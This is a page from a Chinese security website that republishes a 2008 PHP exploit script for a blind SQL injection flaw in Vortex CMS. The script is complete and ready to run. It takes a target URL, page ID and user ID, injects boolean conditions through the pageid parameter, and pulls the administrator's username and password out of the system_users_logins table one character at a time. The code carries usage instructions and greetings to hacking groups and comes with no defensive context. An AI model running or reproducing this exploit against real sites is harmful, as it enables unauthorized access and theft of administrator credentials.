首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Vortex CMS (index.php pageid) Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:Lidloses 发布时间:2008-05-12  
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#   Vortex CMS - Blind SQL Injection Exploit    
#                                                            
#      Vulnerability discovered by: Lidloses_Auge            
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco
#                                   GPM, Free-Hack
#      Date:                        10.05.2008
#
###############################################################
#                                                            
#      Usage: php '.$argv[0].' [Target] [Page ID] [User ID]
#      Example for "http://www.site.com/cms/index.php?pageid=1"
#      => php '.$argv[0].' http://www.site.com/cms/ 1 1
#                                                            
###############################################################
');
if ($argc > 1) {
print_r('
');
   echo 'Searching for Admin: ';
   for($i=1; $i <= 50; $i++) {
      $temp1 = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((select+username+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*');
      if (strpos($temp1,'Sorry, the page you requested could not be found.') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=46; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(substring((select+username+from+system_users_logins+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'/*');
         if (strpos($temp,'Sorry, the page you requested could not be found.') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 64;
         }
      }
   }
print_r('
');
   echo 'Searching for Password: ';
   for($i=1; $i <= 50; $i++) {
      $temp1 = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((select+password+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*');
      if (strpos($temp1,'Sorry, the page you requested could not be found.') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=46; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(substring((select+password+from+system_users_logins+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'/*');
         if (strpos($temp,'Sorry, the page you requested could not be found.') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 64;
         }
      }
   }
}
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·QuickUpCMS Multiple Remote SQL
·Battle.net Clan Script <= 1.5.
·Joomla Component xsstream-dm 0
·CMS Made Simple <= 1.2.4 (File
·rdesktop 1.5.0 process_redirec
·Advanced Image Hosting (AIH) 2
·Joomla Component com_datsogall
·EQDKP 1.3.2f (user_id) Authent
·txtCMS 0.3 (index.php) Local F
·IDAutomation Bar Code ActiveX
·La-Nai CMS <= 1.2.16 (fckedito
·MS Internet Explorer (Print Ta
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved